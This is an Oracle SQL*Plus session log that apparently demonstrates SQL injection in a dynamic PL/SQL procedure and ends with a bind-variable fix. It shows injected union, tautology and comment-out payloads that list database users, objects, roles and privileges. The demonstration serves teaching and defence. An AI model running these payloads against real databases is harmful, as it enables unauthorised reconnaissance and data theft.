Table dropped. Table created. 1 row created. 1 row created. 1 row created. Procedure created. No errors. debug:select customer_phone from customers where customer_surname='x' select username from all_users where 'x'='x' -933ORA-00933: SQL command not properly ended PL/SQL procedure successfully completed. debug:select customer_phone from customers where customer_surname='x';select username from all_users where 'x'='x' -911ORA-00911: invalid character PL/SQL procedure successfully completed. debug:select customer_phone from customers where customer_surname='x' union select username from all_users where 'x'='x' ::AURORA$JIS$UTILITY$ ::AURORA$ORB$UNAUTHENTICATED ::CTXSYS ::DBSNMP ::MDSYS ::ORDPLUGINS ::ORDSYS ::OSE$HTTP$ADMIN ::OUTLN ::SYS ::SYSTEM ::TRACESVR PL/SQL procedure successfully completed. debug:select customer_phone from customers where customer_surname='x' or exists (select 1 from sys.dual) and 'x'='x' ::999444888 ::999555888 ::999777888 PL/SQL procedure successfully completed. debug:select customer_phone from customers where customer_surname='x' or 'x'='x' ::999444888 ::999555888 ::999777888 PL/SQL procedure successfully completed. Procedure created. debug:select customer_phone from customers where customer_surname='x' or 'x'='x' --' and customer_type=1 ::999444888 ::999555888 ::999777888 PL/SQL procedure successfully completed. from dba_objects * ERROR at line 2: ORA-01031: insufficient privileges debug:select customer_phone from customers where customer_surname='x' union select sys.login_user from sys.dual where 'x'='x' ::DBSNMP PL/SQL procedure successfully completed. debug:select customer_phone from customers where customer_surname='x' union select to_char(sysdate) from sys.dual@plsq where 'x'='x' ::20-NOV-02 PL/SQL procedure successfully completed. Procedure created. No errors. debug:select customer_phone,customer_forname,customer_surname from customers where customer_surname='x' union select 1,'Y' from sys.dual where 'x'='x' -1789ORA-01789: query block has incorrect number of result columns PL/SQL procedure successfully completed. debug:select customer_phone,customer_forname,customer_surname from customers where customer_surname='x' union select object_name,object_type,'x' from user_objects where 'x'='x' ::CUSTOMERS:TABLE:x ::DBA_DATA_FILES:SYNONYM:x ::DBA_FREE_SPACE:SYNONYM:x ::DBA_SEGMENTS:SYNONYM:x ::DBA_TABLESPACES:SYNONYM:x ::GET_CUST:PROCEDURE:x ::GET_CUST2:PROCEDURE:x ::GET_CUST_BIND:PROCEDURE:x ::PLSQ:DATABASE LINK:x PL/SQL procedure successfully completed. debug:select customer_phone,customer_forname,customer_surname from customers where customer_surname='x' union select granted_role,admin_option,default_role from user_role_privs where 'x'='x' ::CONNECT:NO:YES ::RESOURCE:NO:YES ::SNMPAGENT:NO:YES PL/SQL procedure successfully completed. debug:select customer_phone,customer_forname,customer_surname from customers where customer_surname='x' union select privilege,admin_option,'X' from user_sys_privs where 'x'='x' ::CREATE PUBLIC SYNONYM:NO:X ::UNLIMITED TABLESPACE:NO:X PL/SQL procedure successfully completed. COUNT(*) OBJECT_TYPE OWNER --------- ------------------------------ --------------- 2 CONSUMER GROUP SYS 22 FUNCTION SYS 2 INDEXTYPE CTXSYS 2 INDEXTYPE MDSYS 160 JAVA CLASS ORDSYS 9631 JAVA CLASS SYS 130 JAVA RESOURCE SYS 9 LIBRARY MDSYS 3 OPERATOR CTXSYS 13 OPERATOR MDSYS 7 PACKAGE CTXSYS 26 PACKAGE MDSYS 13 PACKAGE ORDPLUGINS 12 PACKAGE ORDSYS 90 PACKAGE SYS 3 PROCEDURE DBSNMP 9 PROCEDURE SYS 1 SEQUENCE MDSYS 4 SYNONYM DBSNMP 10836 SYNONYM PUBLIC 1 TABLE DBSNMP COUNT(*) OBJECT_TYPE OWNER --------- ------------------------------ --------------- 3 TABLE MDSYS 6 TABLE SYS 1 TABLE SYSTEM 5 TYPE CTXSYS 20 TYPE MDSYS 8 TYPE ORDSYS 30 TYPE SYS 34 VIEW CTXSYS 31 VIEW MDSYS 529 VIEW SYS 1 VIEW SYSTEM 32 rows selected. Procedure created. No errors. debug:select customer_phone from customers where customer_surname=:surname ::999444888 ::999777888 PL/SQL procedure successfully completed. debug:select customer_phone from customers where customer_surname=:surname PL/SQL procedure successfully completed.